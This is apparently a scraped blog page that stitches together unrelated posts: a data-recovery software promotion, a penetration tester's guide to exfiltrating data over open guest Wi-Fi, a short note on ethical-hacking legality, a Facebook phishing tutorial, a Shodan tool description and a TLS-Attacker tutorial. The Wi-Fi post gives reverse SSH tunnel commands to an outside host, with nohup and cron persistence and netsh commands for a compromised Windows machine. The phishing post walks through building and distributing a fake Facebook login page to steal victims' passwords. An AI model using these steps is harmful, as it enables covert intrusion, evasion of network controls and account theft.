ブログはじめました。日本語だと不便です。機能も少ないです。 なのでそのうち他のサービスを探します。ここはとりあえず実験的に。

金曜日, 6月 12, 2020

How To Recover Files That Are Deleted From Recycle Bin

How To Recover Files That Are Deleted From Recycle Bin

How To Recover Files That Are Deleted From Recycle Bin

How To Recover Files That Are Deleted From Recycle Bin

Well, Windows users have a bad habit of removing files from recycle bin. Deleting useless files from Recycle Bin helps a user to save some storage space which can improve the speed of a computer. However, Windows users do that more frequently and later regret. Actually, Recycle Bin is a place from where we can get back our deleted files and folders.
Sometimes, we accidentally delete our important files and folders and due to some reason we lose them from Recycle bin too! At that time, we search for recovery methods. Well, there are many methods available over the web which can help you to recover deleted files from computer, but, when it comes to reliability, nothing can beat EaseUS.

What Is EaseUS Data Recovery Wizard?

EaseUS is one of the leading software providers which is known for its data recovery programme. EaseUS offers some free data recovery software that can help you to recover deleted, formatted or lost data from PC, laptop or removable device easily and quickly.
One of the best thing about EaseUS is that it provides tools for recycle bin recovery which can help you to get back files that you have deleted from the Recycle bin itself. EaseUS Data Recovery Wizard free can easily recover lost files, pictures, documents, videos and more from deleting, formatting, partition loss, OS crash, virus attack and other data loss cases.

How To Recover Deleted Files?

If you are struggling to get back your lost data files, then here is an easy data recovery method which will help you to get back deleted files on your computer. Below, we are going to share a mini guide on how to use EaseUS Recycle Bin Recovery to get back your deleted data.
Step 1. First of all, you need to download and install EaseUS Data Recovery Wizard on your Windows computer and then launch it normally. You need to select the location where you want to scan and then click on 'Scan'
Step 2. Now, wait for few minutes until the tool finishes scanning your drive. The tool search for files that got deleted or cleaned from the Recycle Bin.
Step 3. Now it will show you files that you can recover. Here you need to click on the file which you want to recover and click on 'Recover'
That's it, you are done! This is how you can use EaseUS data recovery to get back your deleted files on your computer.

Benefits of EaseUS Data Recovery

Well, the data recovery tool provided by EaseUS comes with many benefits. It can not only recover accidentally deleted files, but it can also recover data in case of Virus Attacks, Hard Disk Damage, OS Crash etc.
You can also use this awesome data recovery wizard to recover deleted files from External Disk, USB Drive, Camcorder, Mobile Devices, Zip Drive, iPod, Music Player and more.
Overall, this is one of the best data recovery tools you can have on your Windows computer. EaseUS Data Recovery also has a free version with restricted features. Overall, this is a stress-free solution to get back your deleted files
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Galileo - Web Application Audit Framework

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木曜日, 6月 11, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

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水曜日, 6月 10, 2020

LEGALITY OF ETHICAL HACKING

Why ethical hacking?
Legality of Ehical Hacking
 
Ethical hacking is legal if the hacker abides by the rules stipulated in above section on the definition of ethical hacking.

Ethical hacking is not legal for black hat hackers.They gain unauthorized access over a computer system or networks for money extortion.
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HOW TO HACK A FACEBOOK ACCOUNT? STEP BY STEP

Phishing is the way to obtain sensitive information such as usernames, passwords, and credit card details or any other confidential information, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication. Phishing is typically carried out by several ways like email spoofing or instant messaging, and it often directs users to enter personal information at a fake website, the look and feel of which are almost identical to the legitimate one. In this tutorial, I will be showing how to hack a facebook account through phishing.

SO, HOW TO HACK A FACEBOOK ACCOUNT?

There are few techniques by which you can hack a facebook account but here the easiest way we'll discuss.

REQUIREMENTS

  1. Phisher Creator ( Fake page generator)
  2. Hosting ( To host a fake page). Either you can purchase one or also can use free hosting like 110mb.com. But in free hosting, the account will be suspended after a few logins.

STEPS TO FOLLOW

  1. Download phisher creator and run it.
  2. As you run it, you'll see a screen like the shown below. Here you can type the fields as I have done. 
  3. Once you hit the Create Phisher button, it'll create a fake facebook index page and fb_login.php file in the output folder.
  4. Now you need to upload these both files index.html and fb_login.php to the hosting account.
  5. After uploading the file, open the index.html file path. It will open up a page like same facebook page as you can see below.
  6. We're all done, now we just need to copy the URL of our fake page and distribute it to the victims, you just have to trick them with your social engineering that how you convenience them to open this URL to login facebook. Once someone tries to login through your fake facebook page URL, you'll get their account username and password in the log_file.txt in the same directory of hosting where you have uploaded index.php and fb_login.php.
Hope it'll work fine for you and you have learned how to hack a facebook account. If you find any question or query related to this, feel free to comment below or you can also follow another way that might work well for you to hack facebook account.
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火曜日, 6月 09, 2020

ShodanEye: Collect Infomation About All Devices Connected To The Internet With Shodan


About ShodanEye
   This tool collects all information about all devices that are directly connected to the internet with the specified keywords that you enter. This way you get a complete overview.

   Here you can read the latest article about Shodan Eye: Shodan Eye Ethical Hacking Tool Release

   The types of devices that are indexed can vary enormously: from small desktops, refrigerators to nuclear power plants and everything in between. You can find everything using "your own" specified keywords. Examples can be found in a file that is attached:

   The information obtained with this tool can be applied in many areas, a small example:
  • Network security, keep an eye on all devices in your company or at home that are confronted with internet.
  • Vulnerabilities. And so much more.
   For additional data gathering, you can enter a Shodan API key when prompted. A Shodan API key can be found here

Shodan Eye Ethical Hacking Tool Release
   Before we start the year 2020, today there is a new big release ..! Please note, if you have already installed Shodan Eye on your computer, then it is worthwhile to read it carefully. Of course, even if you don't know this Shodan tool yet:
  • Shodan Eye goes from Python 2 to Python 3
  • Save the output of the Shodan Eye results
  • The entry of the Shodan password is no longer visible.

About Shodan Search Engine
   Shoan is a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described it as a search engine of service banners, which are metadata that the server sends back to the client.

   What is the difference between Google or another search engine: The most fundamental difference is that Shodan Eye crawls on the internet, Google on the World Wide Web. However, the devices that support the World Wide Web are only a small part of what is actually connected to the Internet.

Before use this tool, you should note that:
  • This was written for educational purpose and pentest only.
  • The author will not be responsible for any damage ..!
  • The author of this tool is not responsible for any misuse of the information.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal..!

ShodanEye's screenshots:

ShodanEye Installation
   If you're using GNU/Linux, open your terminal and enter these commands:

   If you're a Windows user, follow these steps to install ShodanEye:
  • Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
  • Download shodan-eye-master.zip file.>
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install shodan
    python shodan-eye.py

Video Shodan Eye on YouTube:

Contact to the author:


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Playing With TLS-Attacker

In the last two years, we changed the TLS-Attacker Project quite a lot but kept silent about most changes we implemented. Since we do not have so much time to keep up with the documentation (we are researchers and not developers in the end), we thought about creating a small series on some of our recent changes to the project on this blog.


We hope this gives you an idea on how to use the most recent version (TLS-Attacker 2.8). If you feel like you found a bug, don't hesitate to contact me via GitHub/Mail/Twitter. This post assumes that you have some idea what this is all about. If you have no idea, checkout the original paper from Juraj or our project on GitHub.

TLDR: TLS-Attacker is a framework which allows you to send arbitrary protocol flows.


Quickstart:
# Install & Use Java JDK 8
$ sudo apt-get install maven
$ git clone https://github.com/RUB-NDS/TLS-Attacker
$ cd TLS-Attacker
$ mvn clean package

So, what changed since the release of the original paper in 2016? Quite a lot! We discovered that we could make the framework much more powerful by adding some new concepts to the code which I want to show you now.

Action System

In the first Version of TLS-Attacker (1.x), WorkflowTraces looked like this:
Although this design looks straight forward, it lacks flexibility. In this design, a WorkflowTrace is basically a list of messages. Each message is annotated with a <messageIssuer>, to tell TLS-Attacker that it should either try to receive this message or send it itself. If you now want to support more advanced workflows, for example for renegotiation or session resumption, TLS-Attacker will soon reach its limits. There is also a missing angle for fuzzing purposes. TLS-Attacker will by default try to use the correct parameters for the message creation, and then apply the modifications afterward. But what if we want to manipulate parameters of the connection which influence the creation of messages? This was not possible in the old version, therefore, we created our action system. With this action system, a WorkflowTrace does not only consist of a list of messages but a list of actions. The most basic actions are the Send- and ReceiveAction. These actions allow you to basically recreate the previous behavior of TLS-Attacker 1.x . Here is an example to show how the same workflow would look like in the newest TLS-Attacker version:


As you can see, the <messageIssuer> tags are gone. Instead, you now indicate with the type of action how you want to deal with the message. Another important thing: TLS-Attacker uses WorkflowTraces as an input as well as an output format. In the old version, once a WorkflowTrace was executed it was hard to see what actually happened. Especially, if you specify what messages you expect to receive. In the old version, your WorkflowTrace could change during execution. This was very confusing and we, therefore, changed the way the receiving of messages works. The ReceiveAction has a list of <expectedMessages>. You can specify what you expect the other party to do. This is mostly interesting for performance tricks (more on that in another post), but can also be used to validate that your workflow executedAsPlanned. Once you execute your ReceiveAction an additional <messages> tag will pop up in the ReceiveAction to show you what has actually been observed. Your original WorkflowTrace stays intact.


During the execution, TLS-Attacker will execute the actions one after the other. There are specific configuration options with which you can control what TLS-Attacker should do in the case of an error. By default, TLS-Attacker will never stop, and just execute whatever is next.

Configs

As you might have seen the <messageIssuer> tags are not the only thing which is missing. Additionally, the cipher suites, compression algorithms, point formats, and supported curves are missing. This is no coincidence. A big change in TLS-Attacker 2.x is the separation of the WorkflowTrace from the parameter configuration and the context. To explain how this works I have to talk about how the new TLS-Attacker version creates messages. Per default, the WorkflowTrace does not contain the actual contents of the messages. But let us step into TLS-Attackers point of view. For example, what should TLS-Attacker do with the following WorkflowTrace:

Usually, the RSAClientKeyExchange message is constructed with the public key from the received certificate message. But in this WorkflowTrace, we did not receive a certificate message yet. So what public key are we supposed to use? The previous version had "some" key hardcoded. The new version does not have these default values hardcoded but allows you as the user to define the default values for missing values, or how our own messages should be created. For this purpose, we introduced the new concept of Configs. A Config is a file/class which you can provide to TLS-Attacker in addition to a WorkflowTrace, to define how TLS-Attacker should behave, and how TLS-Attacker should create its messages (even in the absence of needed parameters). For this purpose, TLS-Attacker has a default Config, with all the known hardcoded values. It is basically a long list of possible parameters and configuration options. We chose sane values for most things, but you might have other ideas on how to do things. You can execute a WorkflowTrace with a specific config. The provided Config will then overwrite all existing default values with your specified values. If you do not specify a certain value, the default value will be used. I will get back to how Configs work, once we played a little bit with TLS-Attacker.

TLS-Attacker ships with a few example applications (found in the "apps/" folder after you built the project). While TLS-Attacker 1.x was mostly a standalone tool, we currently see TLS-Attacker more as a library which we can use by our more sophisticated projects. The current example applications are:
  • TLS-Client (A TLS-Client to execute WorkflowTraces with)
  • TLS-Server (A TLS-Server to execute WorkflowTraces with)
  • Attacks (We'll talk about this in another blog post)
  • TLS-Forensics (We'll talk about this in another blog post)
  • TLS-Mitm (We'll talk about this in another blog post)
  • TraceTool (We'll talk about this in another blog post) 

TLS-Client

The TLS-Client is a simple TLS-Client. Per default, it executes a handshake for the default selected cipher suite (RSA). The only mandatory parameter is the server you want to connect to (-connect).

The most trivial command you can start it with is:

Note: The example tool does not like "https://" or other protocol information. Just provide a hostname and port

Depending on the host you chose your output might look like this:

or like this:

So what is going on here? Let's start with the first execution. As I already mentioned. TLS-Attacker constructs the default WorkflowTrace based on the default selected cipher suite. When you run the client, the WorkflowExecutor (part of TLS-Attacker which is responsible for the execution of a WorkflowTrace) will try to execute the handshake. For this purpose, it will first start the TCP connection.
This is what you see here:

After that, it will execute the actions specified in the default WorkflowTrace. The default WorkflowTrace looks something like this:
This is basically what you see in the console output. The first action which gets executed is the SendAction with the ClientHello.

Then, we expect to receive messages. Since we want to be an RSA handshake, we do not expect a ServerKeyExchange message, but only want a ServerHello, Certificate and a ServerHelloDone message.

We then execute the second SendAction:

and finally, we want to receive a ChangeCipherSpec and Finished Message:

In the first execution, these steps all seem to have worked. But why did they fail in the second execution? The reason is that our default Config does not only allow specify RSA cipher suites but creates ClientHello messages which also contain elliptic curve cipher suites. Depending on the server you are testing with, the server will either select and RSA cipher suite, or an elliptic curve one. This means, that the WorkflowTrace will not executeAsPlanned. The server will send an additional ECDHEServerKeyExchange. If we would look at the details of the ServerHello message we would also see that an (ephemeral) elliptic curve cipher suite is selected:

Since our WorkflowTrace is configured to send an RSAClientKeyExchange message next, it will just do that:

Note: ClientKeyExchangeMessage all have the same type field, but are implemented inside of TLS-Attacker as different messages

Since this RSAClientKeyExchange does not make a lot of sense for the server, it rejects this message with a DECODE_ERROR alert:

If we would change the Config of TLS-Attacker, we could change the way our ClientHello is constructed. If we specify only RSA cipher suites, the server has no choice but to select an RSA one (or immediately terminate the connection). We added command line flags for the most common Config changes. Let's try to change the default cipher suite to TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA:

As you can see, we now executed a complete ephemeral elliptic curve handshake. This is, because the -cipher flag changed the <defaultSelectedCiphersuite> parameter (among others) in the Config. Based on this parameter the default WorkflowTrace is constructed. If you want, you can specify multiple cipher suites at once, by seperating them with a comma.

We can do the same change by supplying TLS-Attacker with a custom Config via XML. To this we need to create a new file (I will name it config.xml) like this:

You can then load the Config with the -config flag:

For a complete reference of the supported Config options, you can check out the default_config.xml. Most Config options should be self-explanatory, for others, you might want to check where and how they are used in the code (sorry).

Now let's try to execute an arbitrary WorkflowTrace. To do this, we need to store our WorkflowTrace in a file and load it with the -workflow_input parameter. I just created the following WorkflowTrace:


As you can see I just send a ServerHello message instead of a ClientHello message at the beginning of the handshake. This should obviously never happen but let's see how the tested server reacts to this.
We can execute the workflow with the following command:

The server (correctly) responded with an UNEXPECTED_MESSAGE alert. Great!

Output parameters & Modifications

You are now familiar with the most basic concepts of TLS-Attacker, so let's dive into other things TLS-Attacker can do for you. As a TLS-Attacker user, you are sometimes interested in the actual values which are used during a WorkflowTrace execution. For this purpose, we introduced the -workflow_output flag. With this parameter, you can ask TLS-Attacker to store the executed WorkflowTrace with all its values in a file.
Let's try to execute our last created WorkflowTrace, and store the output WorkflowTrace in the file out.xml:


The resulting WorkflowTrace looks like this:

As you can see, although the input WorkflowTrace was very short, the output trace is quite noisy. TLS-Attacker will display all its intermediate values and modification points (this is where the modifiable variable concept becomes interesting). You can also execute the output workflow again.


Note that at this point there is a common misunderstanding: TLS-Attacker will reset the WorkflowTrace before it executes it again. This means, it will delete all intermediate values you see in the WorkflowTrace and recompute them dynamically. This means that if you change a value within <originalValue> tags, your changes will just be ignored. If you want to influence the values TLS-Attacker uses, you either have to manipulate the Config (as already shown) or apply modifications to TLS-Attackers ModifiableVariables. The concept of ModifiableVariables is mostly unchanged to the previous version, but we will show you how to do this real quick anyway.

So let us imagine we want to manipulate a value in the WorkflowTrace using a ModifiableVariable via XML. First, we have to select a field which we want to manipulate. I will choose the protocol version field in the ServerHello message we sent. In the WorkflowTrace this looked like this:

For historical reasons, 0x0303 means TLS 1.2. 0x0300 was SSL 3. When they introduced TLS 1.0 they chose 0x0301 and since then they just upgraded the minor version.

In order to manipulate this ModifiableVariable, we first need to know its type. In some cases it is currently non-trivial to determine the exact type, this is mostly undocumented (sorry). If you don't know the exact type of a field you currently have to look at the code. The following types and modifications are defined:
  • ModifiableBigInteger: add, explicitValue, shiftLeft, shiftRight, subtract, xor
  • ModifiableBoolean: explicitValue, toggle
  • ModifiableByteArray: delete, duplicate, explicitValue, insert, shuffle, xor
  • ModifiableInteger: add, explicitValue, shiftLeft, shiftRight, subtract, xor
  • ModifiableLong: add, explicitValue, subtract, xor
  • ModifiableByte: add, explicitValue, subtract, xor
  • ModifiableString: explicitValue
As a rule of thumb: If the value is only up to 1 byte of length we use a ModifiableByte. If the value is up to 4 bytes of length, but the values are used as a normal number (for example in length fields) it is a ModifiableInteger. Fields which are used as a number which are bigger than 4 bytes (for example a modulus) is usually a ModifiableBigInteger. Most other types are encoded as ModifiableByteArrays. The other types are very rare (we are currently working on making this whole process more transparent).
Once you have found your type you have to select a modification to apply to it. For manual analysis, the most common modifications are the XOR modification and the explicit value modification. However, during fuzzing other modifications might be useful as well. Often times you just want to flip a bit and see how the server responds, or you want to directly overwrite a value. In this example, we want to overwrite a value.
Let us force TLS-Attacker to send the version 0x3A3A. To do this I consult the ModifiableVariable README.md for the exact syntax. Since <protocolVersion> is a ModifiableByteArray I search in the ByteArray section.

I find the following snippet:

If I now want to change the value to 0x3A3A I modify my WorkflowTrace like this:

You can then execute the WorkflowTrace with:

With Wireshark you can now observe  that the protocol version got actually changed. You would also see the change if you would specify a -workflow_output or if you start the TLS-Client with the -debug flag.

More Actions

As I already hinted, TLS-Attacker has more actions to offer than just a basic Send- and ReceiveAction (50+ in total). The most useful, and easiest to understand actions are now introduced:

ActivateEncryptionAction

This action does basically what the CCS message does. It activates the currently "negotiated" parameters. If necessary values are missing in the context of the connection, they are drawn from the Config.


DeactivateEncryptionAction

This action does the opposite. If the encryption was active, we now send unencrypted again.


PrintLastHandledApplicationDataAction

Prints the last application data message either sent or received.


PrintProposedExtensionsAction

Prints the proposed extensions (from the client)


PrintSecretsAction

Prints the secrets (RSA) from the current connection. This includes the nonces, cipher suite, public key, modulus, premaster secret, master secret and verify data.


RenegotiationAction

Resets the message digest. This is usually done if you want to perform a renegotiation.


ResetConnectionAction

Closes and reopens the connection. This can be useful if you want to analyze session resumption or similar things which involve more than one handshake.


SendDynamicClientKeyExchangeAction

Send a ClientKeyExchange message, and always chooses the correct one (depending on the current connection state). This is useful if you just don't care about the actual cipher suite and just want the handshake done.


SendDynamicServerKeyExchangeAction

(Maybe) sends a ServerKeyExchange message. This depends on the currently selected cipher suite. If the cipher suite requires the transmission of a ServerKeyExchange message, then a ServerKeyExchange message will be sent, otherwise, nothing is done. This is useful if you just don't care about the actual cipher suite and just want the handshake done.


WaitAction

This lets TLS-Attacker sleep for a specified amount of time (in ms).





As you might have already seen there is so much more to talk about in TLS-Attacker. But this should give you a rough idea of what is going on.

If you have any research ideas or need support feel free to contact us on Twitter (@ic0nz1, @jurajsomorovsky ) or at https://www.hackmanit.de/.

If TLS-Attacker helps you to find a bug in a TLS implementation, please acknowledge our tool(s). If you want to learn more about TLS, Juraj and I are also giving a Training about TLS at Ruhrsec (27.05.2019).
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